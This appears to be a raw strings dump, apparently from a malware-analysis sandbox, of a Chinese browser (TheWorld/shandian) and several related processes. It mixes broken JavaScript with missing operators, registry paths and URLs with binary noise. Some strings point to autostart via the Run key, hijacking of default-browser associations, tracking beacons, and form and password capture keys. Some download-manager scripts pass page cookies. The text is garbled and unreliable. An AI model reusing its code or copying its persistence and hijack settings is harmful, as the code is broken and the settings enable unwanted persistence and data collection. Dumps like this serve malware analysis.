for(var i=0,len=dataList.length;iexternal.setOptionValue(g_s_id, "twhome", "qp" i, dataList[i]);
external.setOptionValue(g_s_id, "twhome", "qp" i, '');
function QP_assign(url){
external.twnewnavigate(window, g_s_id, url, 0, 0, 0, 0);
function QP_adjustUrl(url){
if(pattern.test(url))
return url;
return "http://" url;
var list = QPLocalDataMgr.readData();
var strBuf = external.GetQuickPathValue(g_s_id);
if(strBuf.length){
list = strBuf.split(":&:");
list.pop();
if(list && list.length>0) {
for(var i = 0; i < _strQPItem.length; i    )
temp = _strQPItem[i].split( ":^:" ), strDomain = getDomainByUrl( temp[0] ), strHTML  = ""   QP_InsertFavIcon( strDomain )   ""   filter(temp[1])   "
";
qp_item.innerHTML = strHTML   "";
for (var i = 0, tA = _tag('a', qp_item);i < tA.length; i   )
tA[i].className = tA[i].offsetWidth > 122 ? 'overflowHide' : '';
_userPages = false, qp_tip.style.display='inline', qp_item.style.display='none';
_id('topImg_1').style.filter = 'alpha(opacity='   (qp_show == '0' ? 50 : 99)   ')';
quickpath.style.display = (qp_show == '0' ? 'none' : 'inline'), qp_show == '0' || QP_LoadItem();
btn.innerHTML = "";
qp_show = external.getOptionValue(g_s_id, "twhome", "showqp"), QPshow();
for(var i = 0; i < _strQPItem.length; i    )
temp = _strQPItem[i].split(":^:"), SetArray(g_nCountVB   , temp[0]);
for(var i = 0, strName, col = _tag('li', ul_item), colInput, colInputURL; i < col.length; i    ) {
colInput[0].style.backgroundColor = '', colInput[1].style.backgroundColor = '';
if (colInput[1].value.trim()) {
colInputURL = colInput[1].value.trim();
if(!validateInput(colInputURL)) {
colInput[1].style.backgroundColor = '#f00', colInput[1].focus();
strName = colInput[0].value.trim();
colInput[0].style.backgroundColor = '#f00', colInput[0].focus();
strBufSave  = colInputURL   ':^:', strBufSave  = (strName ? strName : colInputURL)   ':&:';
list.push(colInputURL   ':^:'  (strName ? strName : colInputURL));
else if (colInput[0].value.trim()) {
colInputURL = colInput[0].value.trim();
if(colInputURL == '&' || colInputURL.indexOf(':&') != -1 || colInputURL.indexOf('&:') != -1 || colInputURL.indexOf(':^') != -1 || colInputURL.indexOf('^:') != -1) {
strBufSave  = colInputURL   ':^:'   colInputURL   ':&:';
list.push(colInputURL   ':^:'   colInputURL);
external.SetQuickPathValue(g_s_id, strBufSave);
QPLocalDataMgr.saveData(list);
if(input == '&' || input.indexOf(':&') != -1 || input.indexOf('&:') != -1 || input.indexOf(':^') != -1 || input.indexOf('^:') != -1) {
oNewNode.style.padding = '0', oNewNode.style.margin = '0 0 -5 0';
oNewNode.innerHTML = ""  
""  
""  
"

";
ul_item.appendChild(oNewNode);
if(lis.length > 12) {
for(var i = 12; i < lis.length;)
tItems.push(ul_item.removeChild(lis[i]));
ul_item.style.height = ul_item.offsetHeight 'px';
ul_item.style.overflowX = 'hidden';
ul_item.style.overflowY = 'auto';
ul_item.style.marginTop = '0px';
tWarp.style.width = '530px';
tTitUl.style.marginRight = '45px';
tSep.style.marginRight = '40px';
for(var i = 0; i < tItems.length; i )
ul_item.appendChild(tItems[i]);
else if (lis.length == 12) {
tWarp.style.width = '505px';
tTitUl.style.marginRight = '20px';
tSep.style.marginRight = '15px';
ul_item.style.height = '', ul_item.style.overflowY = 'hidden';
_ef.move(_ef.pane.offsetLeft, _ef.pane.offsetTop);
_tag('textarea', lis[idx ? idx - 1 : lis.length - 1])[0].focus();
parent = obj.parentElement.parentElement,
if (col.length <= 6)
_tag('img', parent)[0].src = 'user2.gif', tArea[0].innerHTML = '', tArea[1].innerHTML = '';
parent.removeNode(true), col.length == 12 && valiItemNumber();
function doOperations () {
var warp = _ef.create('div', '', {'id': 'warp'}, {'border': '1 solid #3499CB','overflow' : 'hidden' , 'width': '505px', 'padding': '0'}), quick = _ef.create('div', '', {}, {'textAlign': 'left', 'padding': '0'}),
tFrame = _ef.create('div', '', {'className': 'title_frame'}, {'margin': '0', 'padding': '10 0 2 0', 'cursor': 'move'}), ulItem = _ef.create('ul', '', {'id': 'ul_item'}, {'width': '97%', 'margin': '-5 3 5 3'}),
qp_item = _ef.create('div', '', {'id': 'qp_item'}, {'margin': '-1 5 0 0', 'textAlign': 'left'}), opTool = _ef.create('div', '', {}, {'textAlign': 'left', 'margin': '0 0 0 7'}),
celBn = _ef.create('button', _tpCancel, {}, {'width': '72px', 'height': '30px', 'margin': '15 0 15 18'}, function () {_ef.close();})
tFrame.appendChild(_ef.create('div', _tpQuickPath, {'className': 'title_l'}, {'margin': '0 0 0 8'})), tFrame.appendChild(_ef.create('div', '
', {'className': 'title_r'}));
tFrame.onmousedown = function () {
x = event.clientX, y = event.clientY, isDrag = true, _ef.fade(0.62);
bEvent.push(_ef.$dom.body.onmousemove, _ef.$dom.body.onmouseout, _ef.$dom.body.onmouseup);
_ef.$dom.body.onmousemove = function () {
if (isDrag && window.event.button) {
var curPX = (_ef.pane.offsetLeft event.clientX - x), curPY = (_ef.pane.offsetTop event.clientY - y),
tWidth = document.body.clientWidth - _ef.pane.offsetWidth, tHeight = document.body.clientHeight - _ef.pane.offsetHeight;
_ef.move(curPX < 0 ? 0 : curPX > tWidth ? tWidth : curPX,
curPY < 0 ? 0 : curPY > tHeight ? tHeight : curPY), x = event.clientX, y = event.clientY;
else if(isDrag && !window.event.button)
_ef.$dom.body.onmouseup = doMouseUp;
for (var i = 0, temp, str, nCount = _strQPItem.length; i < (nCount > 6 ? nCount : 6); i ) {
temp = _strQPItem[i].split(":^:"), str = getDomainByUrl(temp[0]);
var tLi = _ef.create('li', '', {}, {'padding': '0', 'margin': '0 0 -5 0'}), tDiv = _ef.create('div', '', {}, {'paddingLeft': '0px'});
tDiv.innerHTML = QP_InsertFavIcon(i < nCount - 1 ? temp[0] : null);
tDiv.innerHTML = "" (i < nCount ? filter(temp[1]) : '') "";
tDiv.innerHTML = "" (i < nCount ? filter(temp[0]) : '') "";
tDiv.innerHTML = "";
tLi.appendChild(tDiv), ulItem.appendChild(tLi);
_ef.open(), qp_item.appendChild(ulItem), qp_item.innerHTML = '' _tpAddURL '';
opTool.appendChild(_ef.create('button', _tpOK, {}, {'width': '72px', 'height': '30px', 'margin': '15 30 15 10'}, function () {QP_Save() && (location.reload())})),
opTool.appendChild(celBn),
qp_item.appendChild(opTool), quick.appendChild(tFrame), quick.appendChild(_ef.create('div', '', {'id': '_tw_quick_separator', 'className': 'separator'}, {'margin': '0 15 -10 15'}));
quick.appendChild(_ef.create('div', '' _tpName '', {'id': '_tpName'}, {'styleFloat': 'left', 'width': '200px', 'textAlign': 'left', 'paddingLeft': '39px', 'fontSize': '12px', 'margin': '0'})),
quick.appendChild(_ef.create('div', '' _tpAddress '', {'id': '_tpAddress'}, {'styleFloat': 'left', 'width': '280px', 'textAlign': 'left', 'paddingLeft': '37px', 'fontSize': '12px', 'margin': '0'})),
quick.appendChild(qp_item), warp.appendChild(quick), _ef.setBody(warp);
_ef.move((_ef.$dom.body.offsetWidth - 515) / 2, (_ef.$dom.body.clientHeight - 480) / 4), valiItemNumber(1);
isDrag = false, _ef.fade(0.99),
_ef.$dom.body.onmousemove = bEvent[0] || null,
_ef.$dom.body.onmouseout = bEvent[1] || null,
_ef.$dom.body.onmouseup = bEvent[2] || null,
document.body.onkeypress = function doKeyPress() {
if (event.keyCode == 13)
return QP_Save() ? location.reload() : false;
celBn.onblur = function () {
clImg.offsetWidth && clImg.focus();
external.SetOptionValue(g_s_id, n, k, v);
String.prototype.trim = function () {return this.replace(/(^\s*)|(\s*$)/g, '');}
str = str.replace(/&/g, '&');
str = str.replace(/
str = str.replace(/>/g, '>');
str = str.replace(/'/g, '´');
str = str.replace(/"/g, '"');
str = str.replace(/\|/g, '¦');
function _id (id) {return document.getElementById(id);}
P#VQm.ZJN4
version="2.0.0.1"
name="TheWorld.exe"/>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
7>Url
%XZ9A
}).bf~
whCQ D.hs
z"%U?
.IDATx
weBR&E
\/:*?"<>|
%s\%s
%s\%s.url
%s(%d)%s
%d,0,0,0,700,0,0,0,%d,0,0,0,0,%s
%d,0,0,0,0,0,0,0,%d,0,0,0,0,%s
%sskin\%s
by %s ver: %s
%s: %s
by %s, ver: %s
%sskin\%s\preview.png
%sskin\%s\skin.ini
res://%s/IMG_PREVIEW
plugin.ini
theworld.ac
ADDRESS_URL
http://www.fjmjm.com/web/navierr
Software\Microsoft\Internet Explorer\TypedUrls
%s\%s\
%s\*.*
Psc.js
bypassdomain%d
url%d
exdm%d
redm%d
boundm%d
exd%d
red%d
exh%d
reh%d
bypass%d
qzone.qq.com
http://
%*.*f
%s%u.dat
%sca%u.dat
tw_form_url
password
form.ini
login
nick
loginuser
%s%saction=f&ver=%s&guid=%s
%s%saction=a&ver=%s&guid=%s
%s%saction=m&ver=%s&guid=%s
http://stat.fjmjm.com/web/theworld2up.ini
2.4.1.9
SUBVER_%s
%sTheWorld_%s_%s.zip
TheWorld.exe
%s%s%s
TheWorld.ini
%s %s
Update.ini
WWW_OpenURLNewWindow
WWW_OpenURL
%d_info
%d_url
dltool.ini
TheWorld.xml
%c:\%s\
%s.%s
index.htm
%s#MetalinkFile%d
DefaultPassword
DefaultLogin
StateWindowSize
%H:%M:%S
%Y-%m-%d %H:%M:%S
Path%d
1.0.0.0
2.0.0.0
%s%s(%d)%s
%s KB
%s %s, %s
%s,%s
MIME\Database\Content Type\%s
.aspx
%d:%s
%d.%d.%d %s
0xx
Name:%s
Version:%s
FileVersion:%s
CmdLine:%s
Module:%s
Module Version:%s
Code:%s
Offset:%s
OS Version:%s
IE Version:%s
multipart/form-data; boundary=%s
http://feedback.theworld.cn/collection/
dbghelp.dll
|.url|.lnk|.htm|.html|.txt|
http://www.theworld.cn/client/sync
favsorder.db
%s*.*
.ShellClassInfo
%s\Desktop.ini
FAV_URL
%s (%d)
,tww=d
%s_url
.shtml
%s://%s/favicon.ico
%s%s_favicon.ico
%s\url.dll
http://about:blank
"%s" "%%1"
%s\%s\command
https
%s\%s\UserChoice
.mhtml
.shtm
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\ftp\UserChoice
TheWorld.AssocFile.MHT\Shell
TheWorld.AssocFile.HTM\Shell
TheWorld.HTTP\Shell
TheWorld.AssocFile.MHT\DefaultIcon
IE.AssocFile.MHT\DefaultIcon
TheWorld.HTTP\DefaultIcon
TheWorld.AssocFile.HTM\DefaultIcon
IE.AssocFile.HTM\DefaultIcon
IE.HTTP
IE.AssocFile.MHT
IE.AssocFile.HTM
TheWorld.HTTP
TheWorld.AssocFile.MHT
TheWorld.AssocFile.HTM
SOFTWARE\Classes\.mhtml
SOFTWARE\Classes\.mht
SOFTWARE\Classes\.shtml
SOFTWARE\Classes\.shtm
SOFTWARE\Classes\.html
SOFTWARE\Classes\.htm
ftp\shell
https\DefaultIcon
http\DefaultIcon
%SystemRoot%\system32\url.dll,0
https\shell
http\shell
CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32
SOFTWARE\Clients\StartMenuInternet\%s\shell\open\command
IEXPLORE.EXE
SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command
SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE
SOFTWARE\Clients\StartMenuInternet\%s\
-1,-1,-1,-1
CLSID\%s\TreatAs
CLSID\%s\LocalServer32
CLSID\%s\InprocServer32
%s\CLSID
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
%s\Internet Explorer\iexplore.exe
ftp://
https://
.net.cn
.com.cn
*www.*.*
%s%s\
skin.ini
%sUpdate\%s\
Version%d
File%d
Name%d
dailytips.ini
%slanguages\dailytips_%s
%s?ver=%s&c=%d&guid=%s
Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION
Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
?url=
Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WEBOC_OMNAVIGATOR_IMPLEMENTATION
HisSearchLeftPad
system32\verclsid.exe
CLSID\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\TreatAs
wininet.dll
kernel32.dll
shell32.dll
D27CDB6E-AE6D-11cf-96B8-444553540000
6BF52A52-394A-11d3-B153-00C04F79FAA6
22d6f312-b0f6-11d0-94ab-0080c74c7e95
02BF25D5-8C17-4B23-BC80-D3488ABDDC6B
CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA
%s\vbscript.dll
[^"' >]*
[^"' >]{1}
$ -^|:'./"()[]{}
[^"' >]*?
ntdll.dll
%s%s.url
|.url|
TWINFO.HTM
InsertInfoItemByHTML( %d, %d, %d, "%s", "%s" );
SearchLeftPad
AdressLeftPad
%s:%s
Software\Microsoft\Windows\CurrentVersion\Internet Settings
http://www.fjmjm.com/cn/help-appendix-04.htm
http://www.theworld.cn/
http://www.fjmjm.com/cn/help.htm
TWFORM.HTM
StatusPluginKey
http://www.fjmjm.com/cn/guide/guide_start.htm
http://www.fjmjm.com/wz
http://bbs.fjmjm.com
%s&guid=%s&lastver=%s
2.1.2.2
2.1.2.4
2.1.0.2
2.0.5.1
2.0.3.4
2.3.0.7
2.3.0.8
2.2.1.0
2.2.1.2
2.2.1.4
NAVIERR.HTM
TheWorld.ico
http://www.google.com.hk/search?client=aff-cs-worldbrowser&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q=%s
http://www.google.com.hk/search?q=
baidu.com/baidu?
baidu.com/s
https:
TheWorld2_AppHotKey
(%d-%d, %d-%d)
%%SaveObjUrl
MediaSaver.js
%sMouseGesture_%d.bmp
%s%s\MouseGesture_%d.bmp
RecentUrl
OldUrl
LastUrl
TempUrl
LockUrl
TWHOME.HTM
[TempUrl]
http://%s
twcache.ini
%s(%u)
%d*%d
external.menuArguments
General_%d
%s%s\%s\plugin.ini
%s%s\%s
TWSTATUSMSG
{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}
CLSID\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
TWOPTIONS.HTM
%s\%s\%s
%sUpdate.ini
SetSearchKey
twgetlasturl
twdeletelasturl
ImportExportFav
GetXmlHttpObj
\theme.ini
%sStartPage\Components\%s
%sStartPage\Themes\%s
%s,%s,%s
twcommon_%d
http://www.theworld.cn/client/down
http://www.theworld.cn/client/up
http://theworld.cn/
http://fjmjm.com/
http://www.fjmjm.com/
%sTheWorld\Update\
%s.zip
Load VBScript.dll failed
%s|%s
%s - %s
http://www.
XMLRequestMsg
SaveClosedUrl
AddressHistory
AAutoKey
SAutoKey
BossKey
UseBossKey
HTTPFilter
ShowLUrlList
SafeExecAll
SafeExec
TreatFBKeyAsTabKey
%s%s%s%s
google.com.hk
google.com
zhidao.baidu.com
http://www.google.cn/search?client=aff-cs-worldbrowser
google.cn
http://www.google.cn/webhp?client=
*@*.txt
:\e161255a-37c3-11d2-bcaa-00c04fd929db
Software\Microsoft\Internet Explorer\TypedURLs
%s?ver=%s&guid=%s&c=%d
http://www.fjmjm.com/web/inst.htm
http://www.fjmjm.com/web/uninst.htm
Site.ini
MFC42U.dll
%s?url=%s&domain=%s&code=%u
http://www.fjmjm.com/web/
AB.GIF
LOGO.JPG
LOGO.GIF
LOGO.PNG
shdoclc.dll/
ieframe.dll/
=http://auto.search.msn.com
color:#000000; background:#%s
%page.url
errorUrl
ieframe.dll
SHDOCLC.DLL
https://www
http://www
0%d:^:%d:^:%d:^:%d:^:%s:^:%s
LeftPad
mailto:?subject=From Browser&body=%s
https://spreadsheets.google.com/
http://spreadsheets.google.com/
https://docs.google.com/
http://docs.google.com/
00000409
00000404
REST %d
200 PORT
HTTP/1.1
Content-Type: %s
Content-Length: %d
Cookie: %s
User-Agent: %s
Range: bytes=%s-
546865576F726C64-86C36F73-2C25-4a7d-91EA-F5581018A42D
http://127.0.0.1/%s
:/\*?"<>|.
%d.%d.%d.%d
\StringFileInfo\xx\%s
%s%d.%s
mapi32.dll
iexplore.exe
http://www.google.cn/search?client=aff-cs-worldbrowser&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q=
%s???.dll
%u - ???
%s.tmp
%s.ini
advapi32.dll
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s
res://%s/%s
rSHDOCVW.DLL
%s %s
i\internet explorer\iexplore.exe
Msxml2.XMLHTTP.2.0
Msxml2.XMLHTTP.3.0
Msxml2.XMLHTTP.4.0
Msxml2.XMLHTTP.5.0
dwmapi.dll
uxtheme.dll
RebarC%d
RebarB%d
RebarA%d
Local\%d%s
res://%s/
%sskin.ini
skin\%s
XTabDrag:%s
USER32.DLL
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
%Documents and Settings%\%current user%\Local Settings\Temp\
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\
%WinDir%\
c:\program files\shandian\bin\shandian.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\TheWorld\Update\
C:\PROGRA~1\shandian\bin\Site.ini
C:\PROGRA~1\shandian\bin\theworld.ac
ems remaining) Downloading picture http://p3.123.sogoucdn.com/imgn/v51/new-erweima2.png...
37.gif...
w.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a14f7d081b4cb2059dd4e9cb28c131c461f1ccc2f88a430cb454a18b9b824a0f140157
123.sogou.com
C:\PROGRA~1\shandian\bin\twcache.ini
%Documents and Settings%\%current user%\Favorites
%Documents and Settings%\%current user%\Local Settings\History
C:\PROGRA~1\shandian\bin\TheWorld.xml
http://www.fjmjm.com/web/navierr.htm
http://123.sogou.com/?22014
come_cn.htm?ver=2.4.1.9&guid=a14f7d081b4cb2059dd4e9cb28c131c461f1ccc2f88a430cb454a18b9b824a0f1401576007&lastver=
http://www.jlbnh.com
%Program Files%\shandian\bin\shandian.ini
res://%Program Files%\shandian\bin\shandian.exe/IL_GESTURE
res://%Program Files%\shandian\bin\shandian.exe/
ARROW.GIF
CALLAPSE.GIF
CALLAPSE_HOVER.GIF
CANCEL.GIF
CLOSE.GIF
DELETE.GIF
EFFECT.JS
EXPAND.GIF
EXPAND_HOVER.GIF
FORMTITLE.GIF
HELP.GIF
INCREASE.GIF
INFO.GIF
INFO_1.GIF
IOAGE.CSS
LINE.GIF
MORE1.GIF
MORE2.GIF
OK.GIF
SZTOP.GIF
SZTOP2.GIF
TOP1.GIF
TOP2.GIF
TOP3.GIF
TWFORMDEFINE.JS
TWOPTIONS.JS
TWOPTIONS.VBS
TWOPTIONSDEFINE.JS
TWPAGE.CSS
TWPAGE_DELETE.GIF
TWPAGE_OLD.GIF
TWPAGE_TOP.GIF
TWWEBDEFINE.JS
TWWEBUTIL.JS
USER.GIF
USER2.GIF
ProgID=JetCar.Netscape
Script=On Error Resume Next:set JetCarCatch=CreateObject("JetCar.Netscape"):if err<>0 then:MsgBox("FlashGet not properly installed!" vbCrLf "Please install FlashGet again"):else:call JetCarCatch.AddUrl("%d_url","%d_info","%page.url"):end if
ProgID=FG2CatchUrl.Netscape
Script=On Error Resume Next:set JetCarCatch=CreateObject("FG2CatchUrl.Netscape"):if err<>0 then:MsgBox("FlashGet 2 not properly installed!" vbCrLf "Please install FlashGet 2 again"):else:call JetCarCatch.AddUrl("%d_url","%d_info","%page.url"):end if
ProgID=BHO.IFlashGetNetscape
Script=On Error Resume Next:set JetCarCatch=CreateObject("BHO.IFlashGetNetscape"):if err<>0 then:MsgBox("FlashGet mini not properly installed!" vbCrLf "Please install FlashGet mini again"):else:call JetCarCatch.AddUrl("%d_url","%d_info","%page.url"):end if
ProgID=NetAnts.API
script=On Error Resume Next:set NetAntsApi=CreateObject("NetAnts.API"):if err<>0 then:MsgBox("NetAnts not properly installed on this PC!"):else:if NetAntsApi.IsUrlExist("%d_url") then : MsgBox("%d_url" vbCrLf "already in queue"):else:call NetAntsApi.AddUrl("%d_url", "%d_info", "%page.url"):end if
ProgID=LeechGetIE.AddURL
script=On Error Resume Next:set LeechGet=CreateObject("LeechGetIE.AddURL"):if err<>0 then:MsgBox("LeechIE.dll is not registered. Please run `regsvr32.exe LeechIE.dll'"):else:call LeechGet.AddUrl("%d_url"):end if
ProgID=LeechGetIE.LeechIE
script=On Error Resume Next:set LeechGet=CreateObject("LeechGetIE.LeechIE"):if err<>0 then:MsgBox("download express is not installed yet"):else:call LeechGet.AddUrl("%d_url"):end if
ProgID=dapie.catcher
script=On Error Resume Next:set DAPExt=CreateObject("dapie.catcher"):if err<>0 then:MsgBox("DAPIE.DLL is not registered or corrupted. Please re-install Download Accelerator Plus"):else:call DAPExt.MenuUrl("%d_url", "%page.url", ""):end if
ProgID=NTIEHelper.NTIEAddUrl
Script=On Error Resume Next:set Obj=CreateObject("NTIEHelper.NTIEAddUrl"):if err<>0 then:MsgBox("NetTransport2 not properly installed!" vbCrLf "Please install NetTransport2 again"):else:call Obj.AddLink("%d_url","%d_url","%d_info"):end if
ProgID=ThunderAgent.Agent
script=On Error Resume Next:set ThunderAgent = CreateObject("ThunderAgEnt.Agent.1"):if err<>0 then:
MsgBox("Thunder is not installed properly!Please Install IDM again"):
call ThunderAgent.AddTask4("%d_url", "", "", "%d_info", "%page.url", -1, 0, -1, document.cookie, "", ""):call ThunderAgent.CommitTasks2(1):set ThunderAgent = nothing:end if
ProgID=xunleibho.CatchRightClick.1
script=On Error Resume Next:set ThunderApi = CreateObject("xunleibho.CatchRightClick.1"):if err<>0 then:
Info="#*01#*" "%d_url" "#*02#*" document.Url "#*03#*" "%d_info" "#*04#*thunder_mini#*05#*"\nr=ThunderApi.sendUrl(Info)
Info="#*01#*" "%d_url" "#*02#*" document.Url "#*03#*" "%d_info" "#*04#*
4#*05#*"\nr=ThunderApi.sendUrl(Info)
ProgID=ThunderServer.WebThunder.1
Script=On Error Resume Next:Set obj=CreateObject("ThunderServer.WebThunder"):If Err<>0 Then:MsgBox("Web
not properly installed!"):Else:Call obj.CallAddTask2("%d_url", "%d_info", "%page.url", 1, "", "", ""):End If
ProgID=NxApi.myComponent
script=On Error Resume Next\nset WGApi=CreateObject("NxApi.myComponent")\nif err<>0 then\nelse\ncall WGApi.AddUrl("%d_url","%d_info","%page.url")\n\nend if
ProgID=DuInvoke.Du_Invoke
script=On Error Resume Next\nset duObject=CreateObject("DuInvoke.Du_Invoke")\nif err<>0 then \n
MsgBox("DownUp2U not properly installed!" vbCrLf "Please install DownUp2U again")\n
else\n call duObject.DownloadOneLink( "%d_url", "%page.url", "%d_info" )\n end if
ProgID=PNP.InterfaceCore.1
if left("%d_url", 5) = "is://" then \n window.navigate("%d_url") \n
ISLink = "is://|link_down|" "%d_info" "|" "%d_url" "|" document.Url "/" \n window.navigate(ISLink)\n end if
ProgID=TuoTuHelper.RDown
set xDownCatch=CreateObject("TuoTuHelper.RDown") :if err<>0 then:
MsgBox("Tuotu
else: call xDownCatch.AddText( "%d_url", "%d_info", document.Url): end if
ProgID=QQIEHelper.QQRightClick.2
Script=On Error Resume Next:set QQRightClick=CreateObject("QQIEHelper.QQRightClick.2"):if err<>0 then:MsgBox("QQDownload not properly installed on this PC!"):else:call QQRightClick.sendUrl2("%d_url",document.Url,"%d_info",document.cookie,0,0):end if
ProgID=Orbitmxt.Orbit
Script=On Error Resume Next:Set obj=CreateObject("Orbitmxt.Orbit"):If Err<>0 Then:MsgBox("Orbit not properly installed!"):Else:Call obj.download("%d_url", "%d_info", "%page.url", ""):End If
ProgID=NXIEHelper.NXIEAddURL
Script=On Error Resume Next:Set obj=CreateObject("NXIEHelper.NXIEAddURL"):If Err<>0 Then:MsgBox("
not properly installed!"):Else:Call obj.AddLink("%page.url","%d_url", "%d_info" ):End If
ProgID=DownlWithIDM.LinkProcessor
script=On Error Resume Next:set IDMLinkProcessor=CreateObject("DownlWithIDM.LinkProcessor"):IDMLinkProcessor.Execute( external.menuArguments )
msctls_hotkey32
HotKey1
%s-ansi
%us-unicode
:http://www.google.com.hk/search?q=%s
:http://www.google.com
GWeb
(*.htm;*.html;*.mht;*.url)|*.htm;*.html;*.mht;*.url|
(*.*)|*.*|
!18,0,0,0,0,0,0,0,134,0,0,5,0,
#18,0,0,0,700,0,0,0,134,0,0,5,0,
:%d/%d/%d
.http://www.fjmjm.com/web/welcome_cn.htm?ver=%s
:^:1:^:http://www.baidu.com/baidu?word=%us&tn=ichuner_4_pg&ie=utf-8:^:b:^:http://www.baidu.com/s?tn=ichuner_4_pg
1:^:Google:^:1:^:http://www.google.com.hk/search?client=aff-cs-worldbrowser&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q=%us:^:g:^:http://www.google.com.hk/webhp?client=aff-worldbrowser&ie=utf-8&oe=UTF-8&hl=zh-CN
(*.png)|*.png|JPEG
(*.jpg;*.jpeg)|*.jpg;*.jpeg;|
(*.bmp)|*.bmp|
http://www.fjmjm.com/cn/skin.htm
#http://www.fjmjm.com/cn/plugins.htm
(*.txt;*.text;)|*.txt;*.text;|
(*.*)|*.*|0
!http://www.fjmjm.com/cn/index.htm
(http://www.fjmjm.com/hl/cn/dailytips.ini$http://www.fjmjm.com/web/navierr.htm
(*.flv*;*.mp*;*.mov*;*.rm*;*.wm?*;*.asf*;*.avi*;*.wav*;*.mid*)
(*.swf*)
(*.js*;*.vbs*;*.css*)
)http://www.fjmjm.com/hl/cn/browsemode.htm
)http://www.fjmjm.com/hl/cn/rendermode.htm
%s ...
: %d%%
...*http://www.fjmjm.com/web/web_search_cn.htm
(*.htm;*.html;)|*.htm;*.html|
.http://www.baidu.com/index.php?tn=ichuner_2_pg
2, 4, 1, 9
Lightning.exe
sdad.exe_1628:

.text
`.rdata
@.data
.rsrc
@.reloc
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
Software\Microsoft\Windows\CurrentVersion\Run
PopWinParam.xml
setup.ini
1.0.0
20131020010000
/web/PopWinParam.asp?d=2014419&mainver=%s&popver=%s&xmlver=%s
%d.%d.%d
%d:%d
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
&#xX;
%s="%s"
%s='%s'
version="%s"
encoding="%s"
standalone="%s"
isShow
kernel32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegQueryInfoKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
imagehlp.dll
VERSION.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
.?AUDWebBrowserEvents2@@
http://stat.fjmjm.com
http://www.fjmjm.com
zcÁ
%Program Files%\shandian\bin\sdad.exe
>>>222:::
:::222@@@
@@@222:::
:::222>>>
4-6}6
8$8(8,808
<*=0=4=8=<=
>!>%>@>}>
0#0'0 0/0
1$2(2,2\2`2
0,080\0|0
1$1,181\1|1
nshell.Explorer.2
ekernel32.dll
KERNEL32.DLL
mscoree.dll
Replace%Select the entire document
Arrange Icons/Arrange windows so they overlap
Cascade Windows5Arrange windows as non-overlapping tiles
Tile Windows5Arrange windows as non-overlapping tiles
Tile Windows(Split the active window into panes
1, 0, 0, 1
mini.exe
iexplore.exe_1664:

%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.Fg
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG
;33;33;0
8888880
8887080
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512
iexplore.exe_1664_rwx_01BC0000_00001000:

%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDownloadProtect.dll
emaaif_70690.exe_2652:

.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
$.psP
6`%U'B
:[email protected]
8%8X8]8d8
9$:*:7:?:
7%7x7
:);|;(<7<
? ?(?0?8?
7 7$7(7,7074787<7
8$9(9<9@9
Thawte Certification1
